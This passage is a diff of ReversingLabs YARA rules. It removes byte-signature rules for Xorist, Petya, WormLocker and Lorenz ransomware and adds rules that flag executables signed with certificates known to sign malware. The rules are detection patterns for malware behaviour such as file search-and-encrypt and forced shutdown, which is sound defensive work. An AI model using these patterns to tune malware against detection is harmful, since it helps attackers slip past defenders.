+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Shang Hai Jian Ji Wang Luo Ke Ji You Xian Gong Si" and pe.signatures [ i ] . serial == "7e:6b:c7:e5:a4:9e:2c:28:e6:f5:d0:42" and 1560995284 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Xorist : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_4C5020899147C850196C4Ebf : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Xorist ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "804ae039-fc3b-5f19-860e-df9efe87ee4d"
-		date = "2020-07-15"
-		modified = "2020-07-15"
+		id = "8ac60604-6548-5f11-bf89-ec7e927b20f7"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.Xorist.yara#L1-L150"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "c428838cdd103f62508a23c9333b08567625291e110aa437324ecf37c62dca36"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L13094-L13110"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "112e834a24c50d639f8607740faa609f1a36539058357544e5dbcddf841f3116"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Xorist"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$search_and_encrypt_v1_p1 = {
-            55 8B EC 81 EC ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 40 0F
-            84 ?? ?? ?? ?? 48 89 45 ?? 8B 85 ?? ?? ?? ?? 83 E0 ?? 0F 84 ?? ?? ?? ?? 8D 85 ?? ??
-            ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50
-            68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            2D ?? ?? ?? ?? 50 C6 80 ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 80 ?? ?? ?? ?? ?? ?? ?? ?? C6 80 ?? ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 58 C7 80 ?? ?? ?? ?? ?? ?? ?? ?? C6 80 ?? ?? ?? ?? ?? E9 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ??
-            ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ??
-            8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 2D ?? ?? ?? ?? C6 80 ?? ?? ?? ?? ?? A0 ?? ?? ?? ?? 3C ?? 75 ??
-            68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 9D ?? ?? ?? ?? 53 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 80
-        }
-		$search_and_encrypt_v1_p2 = {
-            3D ?? ?? ?? ?? ?? 75 ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 F8 ?? 74 ??
-            E9 ?? ?? ?? ?? EB ?? 8B 3D ?? ?? ?? ?? 8B 0F 83 C7 ?? 51 57 68 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 8B D8 57 E8 ?? ?? ?? ?? 03 F8 47 59 83 FB ?? 74 ?? 49 75 ?? E9 ?? ?? ?? ?? 68
-            ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 80 3D ?? ?? ?? ?? ?? 75 ?? 68 ?? ?? ?? ??
-            68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 35 ??
-            ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? EB ?? 80 3D ?? ?? ?? ?? ?? 75 ?? 68 ?? ?? ??
-            ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 00 ?? EB ?? 68 ??
-            ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ??
-            68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 40 85 C0 0F 84 ?? ?? ?? ?? 48 A3 ?? ?? ?? ?? 6A ?? FF
-        }
-		$search_and_encrypt_v1_p3 = {
-            35 ?? ?? ?? ?? E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? 83 F8 ?? 7D ?? FF 35 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? FF 35 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A
-            ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 83 3D ?? ?? ?? ?? ?? 75 ?? E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8A 10 B9
-            ?? ?? ?? ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? AC 32 C2 D0 C2 AA E2 ?? A1 ?? ?? ?? ?? 80
-            3D ?? ?? ?? ?? ?? 75 ?? E8 ?? ?? ?? ?? EB ?? 80 3D ?? ?? ?? ?? ?? 75 ?? E8 ?? ?? ??
-            ?? EB ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? FF 35 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 6A ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ??
-            ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D
-            85 ?? ?? ?? ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? FF 75 ?? E8 ?? ??
-            ?? ?? C9 C3
-        }
-		$extract_rsrc_v1 = {
-            55 8B EC 83 C4 ?? B9 ?? ?? ?? ?? BF ?? ?? ?? ?? 51 57 0F 31 5F 59 25 ?? ?? ?? ?? C1
-            E8 ?? 83 C0 ?? AA E2 ?? 33 C0 AA 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ??
-            ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            6A ?? 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 0B C0 75 ?? C9 C3 89 45 ?? 50 6A ?? E8 ??
-            ?? ?? ?? 0B C0 75 ?? C9 C3 89 45 ?? FF 75 ?? 6A ?? E8 ?? ?? ?? ?? 0B C0 75 ?? C9 C3
-            89 45 ?? 50 E8 ?? ?? ?? ?? 0B C0 75 ?? C9 C3 89 45 ?? 8B D8 6A ?? 6A ?? 6A ?? 6A ??
-            6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 F8 ?? 74 ?? 89 45 ?? 6A ?? 6A
-            ?? 6A ?? FF 75 ?? E8 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 FF 75 ?? 53 FF 75 ?? E8 ?? ?? ??
-            ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? FF 75 ?? E8
-            ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ??
-            C9 C3
-        }
-		$search_and_encrypt_v2_p1 = {
-            55 8B EC 81 EC ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 40 0F
-            84 ?? ?? ?? ?? 48 89 45 ?? 8B 85 ?? ?? ?? ?? 83 E0 ?? 0F 84 ?? ?? ?? ?? 8D 85 ?? ??
-            ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50
-            68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            2D ?? ?? ?? ?? 50 C6 80 ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 80 ?? ?? ?? ?? ?? ?? ?? ?? C6 80 ?? ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 58 C7 80 ?? ?? ?? ?? ?? ?? ?? ?? C6 80 ?? ?? ?? ?? ?? E9 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ??
-            ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ??
-            68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 2D ?? ?? ?? ?? C6 80 ?? ?? ?? ?? ?? A0 ?? ?? ?? ?? 3C
-            ?? 75 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 9D ?? ?? ?? ?? 53 68 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 80 3D ?? ?? ?? ?? ?? 75 ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 F8
-            ?? 74 ?? E9 ?? ?? ?? ?? EB ?? 8B 3D ?? ?? ?? ?? 8B 0F 83 C7 ?? 51 57 68
-        }
-		$search_and_encrypt_v2_p2 = {
-            E8 ?? ?? ?? ?? 8B D8 57 E8 ?? ?? ?? ?? 03 F8 47 59 83 FB ?? 74 ?? 49 75 ?? E9 ?? ??
-            ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 80 3D ?? ?? ?? ?? ?? 75 ?? 68 ??
-            ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            FF 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? EB ?? 80 3D ?? ?? ?? ?? ?? 75 ?? 68
-            ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 00 ?? 6A
-            ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 40 85 C0 0F
-            84 ?? ?? ?? ?? 48 A3 ?? ?? ?? ?? 6A ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? A3 ?? ?? ??
-            ?? 83 F8 ?? 7D ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68
-            ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? FF 35 ?? ??
-            ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 35
-            ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? 75 ?? EB ?? 68 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 8A 10 B9 ?? ?? ?? ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? AC 32 C2
-            D0 C2 AA E2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? FF 35 ?? ?? ?? ?? FF 35 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF
-            35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ??
-            ?? FF 75 ?? E8 ?? ?? ?? ?? C9 C3
-        }
-		$extract_rsrc_v2 = {
-            55 8B EC 83 C4 ?? 53 6A ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? 0B C0 75 ?? E9 ?? ?? ?? ?? 89
-            45 ?? 50 6A ?? E8 ?? ?? ?? ?? 0B C0 75 ?? E9 ?? ?? ?? ?? 89 45 ?? FF 75 ?? 6A ?? E8
-            ?? ?? ?? ?? 0B C0 75 ?? E9 ?? ?? ?? ?? 89 45 ?? 50 E8 ?? ?? ?? ?? 0B C0 75 ?? E9 ??
-            ?? ?? ?? 89 45 ?? 8B F8 6A ?? 57 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C7 ?? 8B 45 ?? 83
-            E8 ?? 50 57 E8 ?? ?? ?? ?? 8B 1F 83 C7 ?? 53 6A ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            0B C0 75 ?? E9 ?? ?? ?? ?? A3 ?? ?? ?? ?? 53 57 FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 03
-            FB 8B 1F 83 C7 ?? 53 6A ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 0B C0 75 ?? E9 ?? ?? ??
-            ?? A3 ?? ?? ?? ?? 53 57 FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 03 FB 8B 1F 83 C7 ?? 53 6A
-            ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 0B C0 75 ?? E9 ?? ?? ?? ?? A3 ?? ?? ?? ?? 53 57
-            FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 03 FB 6A ?? 57 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C7
-            ?? 6A ?? 57 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C7 ?? 6A ?? 57 68 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 83 C7 ?? 6A ?? 57 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C7 ?? 6A ?? 57 68 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 83 C7 ?? 6A ?? 57 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C7 ?? 6A ?? 57
-            68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C7 ?? 6A ?? 57 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C7
-            ?? FF 75 ?? E8 ?? ?? ?? ?? 5B C9 C3
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( ( $extract_rsrc_v1 ) and ( all of ( $search_and_encrypt_v1_p* ) ) ) or ( ( $extract_rsrc_v2 ) and ( all of ( $search_and_encrypt_v2_p* ) ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VANKY TECHNOLOGY LIMITED" and pe.signatures [ i ] . serial == "4c:50:20:89:91:47:c8:50:19:6c:4e:bf" and 1476693792 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Win32_Ransomware_Petya : TC_DETECTION MALICIOUS MALWARE FILE
+rule REVERSINGLABS_Cert_Blocklist_4Efcf7Adc21F070E590D49Ddb8081397 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Petya ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "93d9fb33-88d1-50ec-bf99-1888201c0ec2"
-		date = "2020-07-15"
-		modified = "2020-07-15"
+		id = "df467418-9d57-5ad0-b396-2ef519a22989"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.Petya.yara#L3-L58"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "d2adafcb21b627d614eab79e64e2b96ad09fae796d0670452a19490d8781ce99"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L13112-L13128"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "d60a5bbd50484d620ab60cfd40840abc541c2b7bc1005a9076b69ddd1b938652"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Petya"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$entry_point = {
-            55 8B EC 56 8B 75 ?? 57 83 FE ?? 75 ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 83 C4 ?? FF 75 ?? 56 FF 75 ?? E8 ?? ?? ?? ?? 8B F8 85 F6 75 ?? E8 ??
-            ?? ?? ?? 8B C7 5F 5E 5D C2
-        }
-		$shutdown_pattern = {
-            55 8B EC 83 EC ?? 8D 45 ?? 56 50 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0
-            75 ?? 33 C0 EB ?? 8D 45 ?? 33 F6 50 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 56 56 56 8D
-            45 ?? C7 45 ?? ?? ?? ?? ?? 50 56 FF 75 ?? C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF
-            15 ?? ?? ?? ?? 85 C0 75 ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 50 FF 15
-            ?? ?? ?? ?? 8D 4D ?? 51 6A ?? 56 56 56 68 ?? ?? ?? ?? FF D0 33 C0 83 C4 ?? 40 5E 8B
-            E5 5D C3
-        }
-		$sectionxxxx_pattern = {
-            83 EC ?? 53 55 8B C2 89 4C 24 ?? 56 57 8B C8 89 44 24 ?? 33 D2 E8 ?? ?? ?? ?? 85 C0
-            74 ?? 0F B7 48 ?? 8B FA 83 C1 ?? 03 C8 0F B7 40 ?? 89 44 24 ?? 85 C0 74 ?? BE ?? ??
-            ?? ?? 2B F1 80 39 ?? 8D 59 ?? 6A ?? 5D 75 ?? 85 ED 74 ?? 0F BE 2C 1E 0F BE 03 43 3B
-            E8 74 ?? 83 C1 ?? 83 EE ?? 47 3B 7C 24 ?? 72 ?? 8B CA 85 C9 74 ?? 8B 51 ?? 8B 5C 24
-            ?? 8B FB 03 54 24 ?? 8B F2 8B 4A ?? A5 83 C1 ?? 03 CA 89 4B ?? A5 A5 8B 43 ?? 8D 72
-            ?? 89 43 ?? 8B 43 ?? 89 43 ?? B8 ?? ?? ?? ?? 89 73 ?? 66 39 01 74 ?? 8B 7A ?? 8B 2A
-            03 7A ?? 74 ?? 33 DB 43 2B DE 33 D2 8D 0C 33 8B C5 F7 F1 30 16 46 4F 75 ?? B2 ?? 5F
-            5E 5D 0F B6 C2 5B 83 C4 ?? C3
-        }
-		$crypt_gen_pattern = {
-            55 8B EC 53 57 8B 7D ?? 8D 45 ?? 68 ?? ?? ?? ?? 6A ?? 33 DB 53 53 50 89 1F FF 15 ??
-            ?? ?? ?? 85 C0 75 ?? 6A ?? 58 EB ?? 56 FF 75 ?? 8B 75 ?? 56 FF 75 ?? FF 15 ?? ?? ??
-            ?? 85 C0 75 ?? 6A ?? 58 EB ?? 53 FF 75 ?? FF 15 ?? ?? ?? ?? 89 37 33 C0 5E 5F 5B 5D
-            C3
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $entry_point at pe.entry_point ) and $shutdown_pattern and $sectionxxxx_pattern and $crypt_gen_pattern
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Ding Ruan" and pe.signatures [ i ] . serial == "4e:fc:f7:ad:c2:1f:07:0e:59:0d:49:dd:b8:08:13:97" and 1476921600 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Wormlocker : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_Cbd37C0A651913Ee25A6860D7D5Ccdf2 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects WormLocker ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "6d7b55b7-2e1b-56e0-950f-07a2d3fa17ae"
-		date = "2021-08-12"
-		modified = "2021-08-12"
+		id = "e56205d6-9f02-5a8a-8dd3-b8c323fba4bf"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/ByteCode.MSIL.Ransomware.WormLocker.yara#L1-L69"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "87a4f805de78d7e7dffb176302407453108ca01552c682aeee38f8d0201263c9"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L13130-L13148"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "77cc439aea6eaa5a835b6b1aa50904c1df0d5379228e424ab2d68a3cb654834c"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "WormLocker"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$set_environment = {
-            73 ?? ?? ?? ?? 0A 06 02 7D ?? ?? ?? ?? 00 16 28 ?? ?? ?? ?? 0B 72 ?? ?? ?? ?? 28 ?? ??
-            ?? ?? 0C 08 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0D 02 20 ?? ?? ?? ?? 20 ?? ?? ?? ?? 73 ?? ??
-            ?? ?? 28 ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 72 ??
-            ?? ?? ?? 72 ?? ?? ?? ?? 17 6F ?? ?? ?? ?? 00 07 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ??
-            ?? ?? 28 ?? ?? ?? ?? 00 09 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ??
-            00 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 02 7B ?? ??
-            ?? ?? 6F ?? ?? ?? ?? 00 06 28 ?? ?? ?? ?? 7D ?? ?? ?? ?? 73 ?? ?? ?? ?? 25 20 ?? ?? ??
-            ?? 6F ?? ?? ?? ?? 00 13 ?? 11 ?? 06 FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00
-            11 ?? 17 6F ?? ?? ?? ?? 00 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 2A
-        }
-		$find_files = {
-            00 28 ?? ?? ?? ?? 00 16 28 ?? ?? ?? ?? 0A 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 07 72 ?? ??
-            ?? ?? 28 ?? ?? ?? ?? 0C 06 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 17 28 ?? ?? ??
-            ?? 0D 08 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 17 28 ?? ?? ?? ?? 13 ?? 73 ?? ??
-            ?? ?? 13 ?? 72 ?? ?? ?? ?? 13 ?? 16 13 ?? 2B ?? 00 11 ?? 09 11 ?? 9A 11 ?? 6F ?? ?? ??
-            ?? 00 00 11 ?? 17 58 13 ?? 11 ?? 09 8E 69 FE 04 13 ?? 11 ?? 2D ?? 16 13 ?? 2B ?? 00 11
-            ?? 11 ?? 11 ?? 9A 11 ?? 6F ?? ?? ?? ?? 00 00 11 ?? 17 58 13 ?? 11 ?? 11 ?? 8E 69 FE 04
-            13 ?? 11 ?? 2D ?? 2A
-        }
-		$encrypt_files_p1 = {
-            00 14 0A 1E 8D ?? ?? ?? ?? 25 D0 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 73 ?? ?? ?? ?? 0C 00 73
-            ?? ?? ?? ?? 0D 00 09 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 09 20 ?? ?? ?? ?? 6F ?? ?? ?? ??
-            00 03 07 20 ?? ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 09 11 ?? 09 6F ?? ?? ?? ?? 1E 5B 6F ?? ??
-            ?? ?? 6F ?? ?? ?? ?? 00 09 11 ?? 09 6F ?? ?? ?? ?? 1E 5B 6F ?? ?? ?? ?? 6F ?? ?? ?? ??
-            00 09 17 6F ?? ?? ?? ?? 00 08 09 6F ?? ?? ?? ?? 17 73 ?? ?? ?? ?? 13 ?? 00 11 ?? 02 16
-            02 8E 69 6F ?? ?? ?? ?? 00 11 ?? 6F ?? ?? ?? ?? 00 00 DE ?? 11 ?? 2C ?? 11 ?? 6F ?? ??
-            ?? ?? 00 DC 08 6F ?? ?? ?? ?? 0A 00 DE ?? 09 2C ?? 09 6F ?? ?? ?? ?? 00 DC 00 DE ?? 08
-            2C ?? 08 6F ?? ?? ?? ?? 00 DC 06 13 ?? 2B ?? 11 ?? 2A
-        }
-		$encrypt_files_p2 = {
-            00 03 28 ?? ?? ?? ?? 0A 28 ?? ?? ?? ?? 04 6F ?? ?? ?? ?? 0B 28 ?? ?? ?? ?? 07 6F ?? ??
-            ?? ?? 0B 06 07 28 ?? ?? ?? ?? 0C 03 0D 09 08 28 ?? ?? ?? ?? 00 2A
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $set_environment ) and ( $find_files ) and ( all of ( $encrypt_files_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Amma" and ( pe.signatures [ i ] . serial == "00:cb:d3:7c:0a:65:19:13:ee:25:a6:86:0d:7d:5c:cd:f2" or pe.signatures [ i ] . serial == "cb:d3:7c:0a:65:19:13:ee:25:a6:86:0d:7d:5c:cd:f2" ) and 1431734400 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Lorenz : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_5Fe0Ad6B03C57Ab67A352159004Ca3Db : INFO FILE
 {
 	meta:
